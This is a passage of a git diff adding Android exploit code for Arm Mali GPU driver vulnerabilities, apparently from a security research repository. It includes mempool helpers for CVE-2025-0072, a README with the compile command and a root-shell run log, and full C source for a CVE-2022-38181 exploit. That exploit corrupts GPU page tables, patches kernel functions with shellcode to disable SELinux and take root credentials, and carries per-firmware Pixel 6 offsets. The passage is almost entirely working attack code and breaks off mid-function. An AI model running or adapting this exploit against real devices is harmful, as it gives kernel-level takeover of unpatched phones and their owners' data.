mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + reserved_va[i] = alloc.out.gpu_va; + } +} + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]); + if (reserved == MAP_FAILED) { + err(1, "mmap reserved failed %d\n", i); + } + reserved_va[i] = (uint64_t)reserved; + } +} + +uint64_t drain_mem_pool(int mali_fd) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = POOL_SIZE; + alloc.in.commit_pages = POOL_SIZE; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void release_mem_pool(int mali_fd, uint64_t drain) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mempool_utils.h b/SecurityExploits/Android/Mali/CVE-2025-0072/mempool_utils.h new file mode 100644 index 0000000..9aa4caa --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mempool_utils.h @@ -0,0 +1,20 @@ +#ifndef MEMPOOL_UTILS_H +#define MEMPOOL_UTILS_H + +#include +#include "mali_kbase_ioctl.h" +#include "mali_base_csf_kernel.h" +#include "mali_base_kernel.h" +#include "log_utils.h" + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc); + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va); + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va); + +uint64_t drain_mem_pool(int mali_fd); + +void release_mem_pool(int mali_fd, uint64_t drain); + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/README.md b/SecurityExploits/Android/Mali/CVE_2022_38181/README.md new file mode 100644 index 0000000..b89efc7 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_38181/README.md @@ -0,0 +1,41 @@ +## Exploit for CVE-2022-38181 + +The write up can be found [here](https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug). This is a bug in the Arm Mali kernel driver that I reported in July 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root. + +The exploit is tested on the Google Pixel 6. The original exploit that was sent to Google is included as `hello-jni.c` as a reference and was tested on the July 2022 patch of the Pixel 6. Due to the fact that Pixel 6 cannot be downgraded from Android 13 to Android 12, an updated version of the exploit, `mali_shrinker_mmap.c` is included, which supports various firmware in Android 13, including the December patch, which is the latest affected version. For reference, I used the following command to compile with clang in ndk-21: + +``` +android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_shrinker_mmap.c -o mali_shrinker_mmap +``` + +The exploit should be run a couple of minutes after boot and should be fairly reliable. If successful, it should disable SELinux and gain root. + +``` +oriole:/ $ /data/local/tmp/mali_shrinker_mmap +fingerprint: google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys +failed, retry. +failed, retry. +region freed 51 +read 0 +cleanup flush region +jit_freed +jit_free commit: 0 0 +Found freed_idx 0 +Found pgd 20, 769c414000 +overwrite addr : 7701100710 710 +overwrite addr : 7700f00710 710 +overwrite addr : 7701100710 710 +overwrite addr : 7700f00710 710 +overwrite addr : 7700d00710 710 +overwrite addr : 7700f00710 710 +overwrite addr : 7700d00710 710 +overwrite addr : 7701100fd4 fd4 +overwrite addr : 7700f00fd4 fd4 +overwrite addr : 7701100fd4 fd4 +overwrite addr : 7700f00fd4 fd4 +overwrite addr : 7700d00fd4 fd4 +overwrite addr : 7700f00fd4 fd4 +overwrite addr : 7700d00fd4 fd4 +result 50 +oriole:/ # +``` diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/hello-jni2.c b/SecurityExploits/Android/Mali/CVE_2022_38181/hello-jni2.c new file mode 100644 index 0000000..b9ef3ce --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_38181/hello-jni2.c @@ -0,0 +1,759 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include +#include + +#include "mali.h" +#include "mali_base_jm_kernel.h" +#include "midgard.h" + +#ifdef SHELL +#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__) +#else +#include +#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__) + +#endif //SHELL + +#define MALI "/dev/mali0" + +#define PAGE_SHIFT 12 + +#define BASE_MEM_ALIAS_MAX_ENTS ((size_t)24576) + +#define PFN_DOWN(x) ((x) >> PAGE_SHIFT) + +#define SPRAY_PAGES 25 + +#define SPRAY_NUM 64 + +#define FLUSH_SIZE (0x1000 * 0x1000) + +#define SPRAY_CPU 0 + +#define POOL_SIZE 16384 + +#define RESERVED_SIZE 32 + +#define TOTAL_RESERVED_SIZE 1024 + +#define FLUSH_REGION_SIZE 500 + +#define NUM_TRIALS 100 + +#define KERNEL_BASE 0x80000000 + +#define OVERWRITE_INDEX 256 + +#define ADRP_INIT_INDEX 0 + +#define ADD_INIT_INDEX 1 + +#define ADRP_COMMIT_INDEX 2 + +#define ADD_COMMIT_INDEX 3 + +#define AVC_DENY_2108 0x92df1c + +#define SEL_READ_ENFORCE_2108 0x942ae4 + +#define INIT_CRED_2108 0x29a0570 + +#define COMMIT_CREDS_2108 0x180b0c + +#define ADD_INIT_2108 0x9115c000 + +#define ADD_COMMIT_2108 0x912c3108 + +#define AVC_DENY_2201 0x930af4 + +#define SEL_READ_ENFORCE_2201 0x9456bc + +#define INIT_CRED_2201 0x29b0570 + +#define COMMIT_CREDS_2201 0x183df0 + +#define ADD_INIT_2201 0x9115c000 + +#define ADD_COMMIT_2201 0x9137c108 + +#define AVC_DENY_2202 0x930b50 + +#define SEL_READ_ENFORCE_2202 0x94551c + +#define INIT_CRED_2202 0x29b0570 + +#define COMMIT_CREDS_2202 0x183e3c + +#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570 + +#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c + +#define AVC_DENY_2207 0x927664 + +#define SEL_READ_ENFORCE_2207 0x93bf5c + +#define INIT_CRED_2207 0x29e07f0 + +#define COMMIT_CREDS_2207 0x18629c + +#define ADD_INIT_2207 0x911fc000 //add x0, x0, #0x7f0 + +#define ADD_COMMIT_2207 0x910a7108 //add x8, x8, #0x29c + +static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2207; + +static uint64_t avc_deny = AVC_DENY_2207; + +/* +Overwriting SELinux to permissive + strb wzr, [x0] + mov x0, #0 + ret +*/ +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; + +static uint32_t root_code[8] = {0}; + +static uint8_t jit_id = 1; +static uint8_t atom_number = 1; +static uint64_t gpu_va[SPRAY_NUM] = {0}; +static int gpu_va_idx = 0; +static void* flush_regions[FLUSH_REGION_SIZE]; +static void* alias_regions[SPRAY_NUM] = {0}; +static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; + + +struct base_mem_handle { + struct { + __u64 handle; + } basep; +}; + +struct base_mem_aliasing_info { + struct base_mem_handle handle; + __u64 offset; + __u64 length; +}; + +static int open_dev(char* name) { + int fd = open(name, O_RDWR); + if (fd == -1) { + err(1, "cannot open %s\n", name); + } + return fd; +} + +void setup_mali(int fd, int group_id) { + struct kbase_ioctl_version_check param = {0}; + if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) { + err(1, "version check failed\n"); + } + struct kbase_ioctl_set_flags set_flags = {group_id << 3}; + if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { + err(1, "set flags failed\n"); + } +} + +void* setup_tracking_page(int fd) { + void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE); + if (region == MAP_FAILED) { + err(1, "setup tracking page failed"); + } + return region; +} + +void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) { + struct kbase_ioctl_mem_jit_init init = {0}; + init.va_pages = va_pages; + init.max_allocations = 255; + init.trim_level = trim_level; + init.group_id = group_id; + init.phys_pages = va_pages; + + if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) { + err(1, "jit init failed\n"); + } +} + +uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t gpu_alloc_addr) { + struct base_jit_alloc_info info = {0}; + struct base_jd_atom_v2 atom = {0}; + + info.id = id; + info.gpu_alloc_addr = gpu_alloc_addr; + info.va_pages = va_pages; + info.commit_pages = va_pages; + info.extension = 0x1000; + + atom.jc = (uint64_t)(&info); + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC; + atom.nr_extres = 1; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + return *((uint64_t*)gpu_alloc_addr); +} + +void jit_free(int fd, uint8_t atom_number, uint8_t id) { + uint8_t free_id = id; + + struct base_jd_atom_v2 atom = {0}; + + atom.jc = (uint64_t)(&free_id); + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_SOFT_JIT_FREE; + atom.nr_extres = 1; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + +} + +void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) { + struct kbase_ioctl_mem_flags_change change = {0}; + change.flags = flags; + change.gpu_va = gpu_addr; + change.mask = flags; + if (ignore_results) { + ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change); + return; + } + if (ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change) < 0) { + err(1, "flags_change failed\n"); + } +} + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) { + err(1, "mem_alloc failed\n"); + } +} + +void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) { + err(1, "mem_alias failed\n"); + } +} + +void mem_query(int fd, union kbase_ioctl_mem_query* query) { + if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) { + err(1, "mem_query failed\n"); + } +} + +void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) { + struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, pages = pages}; + if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) { + err(1, "mem_commit failed\n"); + } +} + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22); + int prot = PROT_READ; + if (!read_only) { + alloc.in.flags |= BASE_MEM_PROT_GPU_WR; + prot |= PROT_WRITE; + } + alloc.in.va_pages = va_pages; + alloc.in.commit_pages = commit_pages; + mem_alloc(mali_fd, &alloc); + void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + return region; +} + +uint64_t alloc_mem(int mali_fd, unsigned int pages) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void free_mem(int mali_fd, uint64_t gpuaddr) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = gpuaddr}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} + +uint64_t drain_mem_pool(int mali_fd) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = POOL_SIZE; + alloc.in.commit_pages = POOL_SIZE; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void release_mem_pool(int mali_fd, uint64_t drain) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} + +#define CPU_SETSIZE 1024 +#define __NCPUBITS (8 * sizeof (unsigned long)) +typedef struct +{ + unsigned long __bits[CPU_SETSIZE / __NCPUBITS]; +} cpu_set_t; + +#define CPU_SET(cpu, cpusetp) \ + ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS))) +#define CPU_ZERO(cpusetp) \ + memset((cpusetp), 0, sizeof(cpu_set_t)) + +int migrate_to_cpu(int i) +{ + int syscallres; + pid_t pid = gettid(); + cpu_set_t cpu; + CPU_ZERO(&cpu); + CPU_SET(i, &cpu); + + syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu); + if (syscallres) + { + return -1; + } + return 0; +} + +void* flush(int spray_cpu, int idx) { + migrate_to_cpu(spray_cpu); + void* region = mmap(NULL, FLUSH_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + if (region == MAP_FAILED) err(1, "flush failed"); + memset(region, idx, FLUSH_SIZE); + return region; +} + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + reserved_va[i] = alloc.out.gpu_va; + } +} + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]); + if (reserved == MAP_FAILED) { + err(1, "mmap reserved failed"); + } + reserved_va[i] = (uint64_t)reserved; + } +} + +uint64_t alias_sprayed_regions(int mali_fd) { + union kbase_ioctl_mem_alias alias = {0}; + alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + alias.in.stride = SPRAY_PAGES; + + alias.in.nents = SPRAY_NUM; + struct base_mem_aliasing_info ai[SPRAY_NUM]; + for (int i = 0; i < SPRAY_NUM; i++) { + ai[i].handle.basep.handle = gpu_va[i]; + ai[i].length = SPRAY_PAGES; + ai[i].offset = 0; + } + alias.in.aliasing_info = (uint64_t)(&(ai[0])); + mem_alias(mali_fd, &alias); + uint64_t region_size = 0x1000 * SPRAY_NUM * SPRAY_PAGES; + void* region = mmap(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap alias failed"); + } + alias_regions[0] = region; + for (int i = 1; i < SPRAY_NUM; i++) { + void* this_region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ, MAP_SHARED, mali_fd, (uint64_t)region + i * 0x1000 * SPRAY_PAGES); + if (this_region == MAP_FAILED) { + err(1, "mmap alias failed %d\n", i); + } + alias_regions[i] = this_region; + } + return (uint64_t)region; +} + +void fault_pages() { + int read = 0; + for (int va = 0; va < SPRAY_NUM; va++) { + uint8_t* this_va = (uint8_t*)(gpu_va[va]); + *this_va = 0; + uint8_t* this_alias = alias_regions[va]; + read += *this_alias; + } + LOG("read %d\n", read); +} + +int find_freed_idx(int mali_fd) { + int freed_idx = -1; + for (int j = 0; j < SPRAY_NUM; j++) { + union kbase_ioctl_mem_query query = {0}; + query.in.gpu_addr = gpu_va[j]; + query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE; + ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query); + if (query.out.value != SPRAY_PAGES) { + LOG("jit_free commit: %d %llu\n", j, query.out.value); + freed_idx = j; + } + } + return freed_idx; +} + +int find_pgd(int freed_idx, int start_pg) { + uint64_t* this_alias = alias_regions[freed_idx]; + for (int pg = start_pg; pg < SPRAY_PAGES; pg++) { + for (int i = 0; i < 0x1000/8; i++) { + uint64_t entry = this_alias[pg * 0x1000/8 + i]; + if ((entry & 0x443) == 0x443) { + return pg; + } + } + } + return -1; +} + +uint32_t lo32(uint64_t x) { + return x & 0xffffffff; +} + +uint32_t hi32(uint64_t x) { + return x >> 32; +} + +uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { + uint64_t pc_page = pc >> 12; + uint64_t label_page = label >> 12; + int64_t offset = (label_page - pc_page) << 12; + int64_t immhi_mask = 0xffffe0; + int64_t immhi = offset >> 14; + int32_t immlo = (offset >> 12) & 0x3; + uint32_t adpr = rd & 0x1f; + adpr |= (1 << 28); + adpr |= (1 << 31); //op + adpr |= immlo << 29; + adpr |= (immhi_mask & (immhi << 5)); + return adpr; +} + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) { + + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); + //Sets x0 to init_cred + root_code[ADRP_INIT_INDEX] = init_adpr; + root_code[ADD_INIT_INDEX] = add_init; + //Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); + root_code[ADD_COMMIT_INDEX] = add_commit; + root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code[5] = 0xd63f0100; // blr x8 + root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code[7] = 0xd65f03c0; // ret +} + +uint64_t set_addr_lv3(uint64_t addr) { + uint64_t pfn = addr >> PAGE_SHIFT; + pfn &= ~ 0x1FFUL; + pfn |= 0x100UL; + return pfn << PAGE_SHIFT; +} + +static inline uint64_t compute_pt_index(uint64_t addr, int level) { + uint64_t vpfn = addr >> PAGE_SHIFT; + vpfn >>= (3 - level) * 9; + return vpfn & 0x1FF; +} + +void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) { + void* jc_region = map_gpu(mali_fd, 1, 1, false, 0); + struct MALI_JOB_HEADER jh = {0}; + jh.is_64b = true; + jh.type = MALI_JOB_TYPE_WRITE_VALUE; + + struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0}; + payload.type = type; + payload.immediate_value = value; + payload.address = gpu_addr; + + MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh); + MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload); + uint32_t* section = (uint32_t*)jc_region; + struct base_jd_atom_v2 atom = {0}; + atom.jc = (uint64_t)jc_region; + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_CS; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + usleep(10000); +} + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) { + uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; + uint64_t curr_overwrite_addr = 0; + for (int i = 0; i < size; i++) { + uint64_t base = reserved[i]; + uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000; + uint64_t start_idx = compute_pt_index(base, 3); + uint64_t end_idx = compute_pt_index(end, 3); + for (uint64_t addr = base; addr < end; addr += 0x1000) { + uint64_t overwrite_addr = set_addr_lv3(addr); + if (curr_overwrite_addr != overwrite_addr) { + LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset); + curr_overwrite_addr = overwrite_addr; + for (int code = code_size - 1; code >= 0; code--) { + write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); + } + usleep(300000); + } + } + } +} + +int run_enforce() { + char result = '2'; + sleep(3); + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + read(enforce_fd, &result, 1); + close(enforce_fd); + LOG("result %d\n", result); + return result; +} + +void select_offset() { + char fingerprint[256]; + int len = __system_property_get("ro.build.fingerprint", fingerprint); + LOG("fingerprint: %s\n", fingerprint); + if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) { + avc_deny = AVC_DENY_2108; + sel_read_enforce = SEL_READ_ENFORCE_2108; + fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) { + avc_deny = AVC_DENY_2201; + sel_read_enforce = SEL_READ_ENFORCE_2201; + fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) { + avc_deny = AVC_DENY_2202; + sel_read_enforce = SEL_READ_ENFORCE_2202; + fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ3A.220705.003/8671607:user/release-keys")) { + avc_deny = AVC_DENY_2207; + sel_read_enforce = SEL_READ_ENFORCE_2207; + fixup_root_shell(INIT_CRED_2207, COMMIT_CREDS_2207, SEL_READ_ENFORCE_2207, ADD_INIT_2207, ADD_COMMIT_2207); + return; + } + + err(1, "unable to match build id\n"); +} + +void cleanup(int mali_fd, uint64_t pgd) { + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); +} + +void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) { + uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + usleep(100000); + //Go through the reserve pages addresses to write to avc_denied with our own shellcode + write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t)); + + //Triggers avc_denied to disable SELinux + open("/dev/kmsg", O_RDONLY); + + uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + //Call commit_creds to overwrite process credentials to gain root + write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); +} + +void spray(int mali_fd) { + uint64_t cookies[32] = {0}; + for (int j = 0; j < 32; j++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22); + alloc.in.va_pages = SPRAY_PAGES; + alloc.in.commit_pages = 0; + mem_alloc(mali_fd, &alloc); + cookies[j] = alloc.out.gpu_va; + } + for (int j = 0; j < 32; j++) { + void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j]); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + gpu_va[j] = (uint64_t)region; + } + for (int j = 32; j < 64; j++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22); + alloc.in.va_pages = SPRAY_PAGES; + alloc.in.commit_pages = 0; + mem_alloc(mali_fd, &alloc); + cookies[j - 32] = alloc.out.gpu_va; + } + for (int j = 32; j < 64; j++) { + void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j - 32]); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + gpu_va[j] = (uint64_t)region; + } +} + +int trigger(int mali_fd, int mali_fd2, int* flush_idx) { + if (*flush_idx + NUM_TRIALS > FLUSH_REGION_SIZE) { + err(1, "Out of memory."); + } + void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0); + + uint64_t jit_pages = SPRAY_PAGES; + uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr); + atom_number++; + mem_flags_change(mali_fd, (uint64_t)jit_addr, BASE_MEM_DONT_NEED, 0); + for (int i = 0; i < NUM_TRIALS; i++) { + union kbase_ioctl_mem_query query = {0}; + query.in.gpu_addr = jit_addr; + query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE; + flush_regions[i] = flush(SPRAY_CPU, i + *flush_idx); + if (ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0) { + migrate_to_cpu(SPRAY_CPU); + spray(mali_fd); + for (int j = 0; j < SPRAY_NUM; j++) { + mem_commit(mali_fd, gpu_va[j], SPRAY_PAGES); + } + LOG("region freed %d\n", i); + + uint64_t alias_region = alias_sprayed_regions(mali_fd); + fault_pages(); + LOG("cleanup flush region\n"); + for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE); + + uint64_t drain = drain_mem_pool(mali_fd); + release_mem_pool(mali_fd, drain); + + jit_free(mali_fd, atom_number, jit_id); + + map_reserved(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + LOG("jit_freed\n"); + int freed_idx = find_freed_idx(mali_fd); + if (freed_idx == -1) err(1, "Failed to find freed_idx"); + LOG("Found freed_idx %d\n", freed_idx); + int pgd_idx = find_pgd(freed_idx, 0); + if (pgd_idx == -1) err(1, "Failed to find pgd"); + uint64_t pgd = alias_region + pgd_idx * 0x1000 + freed_idx * (SPRAY_PAGES * 0x1000); + LOG("Found pgd %d, %lx\n", pgd_idx, pgd); + atom_number++; + write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); + run_enforce(); + cleanup(mali_fd, pgd); + return 0; + } + } + LOG("failed, retry.\n"); + jit_id++; + *flush_idx += NUM_TRIALS; + return -1; +} + +#ifdef SHELL + +int main() { + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + select_offset(); + int mali_fd = open_dev(MALI); + + setup_mali(mali_fd, 0); + + void* tracking_page = setup_tracking_page(mali_fd); + jit_init(mali_fd, 0x1000, 100, 0); + + int mali_fd2 = open_dev(MALI); + setup_mali(mali_fd2, 1); + setup_tracking_page(mali_fd2); + reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + int flush_idx = 0; + for (int i = 0; i < 10; i++) { + if(!trigger(mali_fd, mali_fd2, &flush_idx)) { + system("sh"); + break; + } + } +} +#else +#include +JNIEXPORT int JNICALL +Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thiz) +{ + setbuf(stdout, NULL); + setbuf(stderr, NULL); + sleep(10); + + select_offset(); + int mali_fd = open_dev(MALI); + + setup_mali(mali_fd, 0); + + void* tracking_page = setup_tracking_page(mali_fd); + jit_init(mali_fd, 